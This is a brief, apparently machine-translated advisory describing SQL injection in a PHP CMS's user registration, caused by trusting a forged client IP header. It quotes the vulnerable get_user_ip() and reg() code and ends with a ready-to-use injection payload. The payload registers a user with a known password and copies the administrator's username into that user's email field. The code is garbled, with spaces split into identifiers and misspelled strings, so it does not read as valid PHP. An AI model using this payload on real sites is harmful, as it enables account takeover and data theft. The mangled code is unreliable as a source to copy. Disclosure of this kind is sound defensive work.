Related Articles: http://www.bkjia.com/Article/201211/168584.html
Vulnerability file: Client. class. php 29 public static function get_user_ip () {if (getenv ('HTTP _ CLIENT_IP ') & strcasecmp (getenv ('HTTP _ CLIENT_IP'), 'unknown ')) {$ onlineip = getenv ('HTTP _ CLIENT_IP ');} elseif (getenv ('HTTP _ X_FORWARDED_FOR') & strcasecmp (getenv ('HTTP _ X_FORWARDED_FOR '), 'unknon') {$ onlineip = getenv ('HTTP _ X_FORWARDED_FOR ');} elseif (getenv ('remote _ ADDR ') & strcasecmp (getenv ('remote _ ADDR '), 'un Known ') {$ onlineip = getenv ('remote _ ADDR');} elseif (isset ($ _ SERVER ['remote _ ADDR ']) & $ _ SERVER ['remote _ ADDR '] & strcasecmp ($ _ SERVER ['remote _ ADDR'], 'unknown ')) {$ onlineip = $ _ SERVER ['remote _ ADDR '];} return $ onlineip;} www.2cto.com/* obviously, a client_ip can be forged for injection */RegsiterController. php 145 line private function reg ($ data) {if (empty ($ data) return false; $ data ['groupid'] = 1; $ data ['regdate'] = time (); $ Data ['regip'] = client: get_user_ip (); // The get_user_ip method is used. This vulnerability is generated. $ data ['status'] = $ this-> memberconfig ['status']? 0: 1; $ data ['modelid'] = (! Isset ($ data ['modelid']) | empty ($ data ['modelid'])? $ This-> memberconfig ['modelid']: $ data ['modelid']; if (! Isset ($ this-> membermodel [$ data ['modelid']) $ this-> memberMsg ('Membership model does not exist. Please contact the administrator. '); If ($ this-> memberconfig ['uc _ use'] = 1) {if (uc_get_user ($ data ['username']) {$ this-> memberMsg ('the user does not need to be registered. Please log on and activate it directly! ', Url ('Member/login'), 1);} $ uid = uc_user_register ($ data ['username'], $ data ['Password'], $ data ['email ']); if ($ uid <= 0) {if ($ uid =-1) {$ this-> memberMsg ('invalid user name');} elseif ($ uid =-2) {$ this-> memberMsg ('contains the words to be allowed registered ');} elseif ($ uid =-3) {$ this-> memberMsg ('user name already exists ');} elseif ($ uid =-4) {$ this-> memberMsg ('incorrect Email format ');} elseif ($ uid =-5) {$ this-> memberMsg ('email is not allowed to be registered ');} elseif ($ uid =-6) {$ this-> memberMsg ('this Email has been registered ');} else {$ this-> memberMsg ('undefined ');}} else {$ username = $ data ['username']; }}$ data ['Password'] = md5 ($ data ['Password']); $ userid = $ this-> member-> insert ($ data); return $ userid ;}
Exp: when a user is submitted for registration, a client_ip address is forged with the following content: sb ', '1', '6'), ('hell', '1b192f49ddec03d0c7e777d3e578cebf ', (select username from fn_user where userid = 1), '1', '000000', 'sbd', '1', '6') # after successful, log on to the user: hell, password: sbdan. there is an administrator user in the mailbox.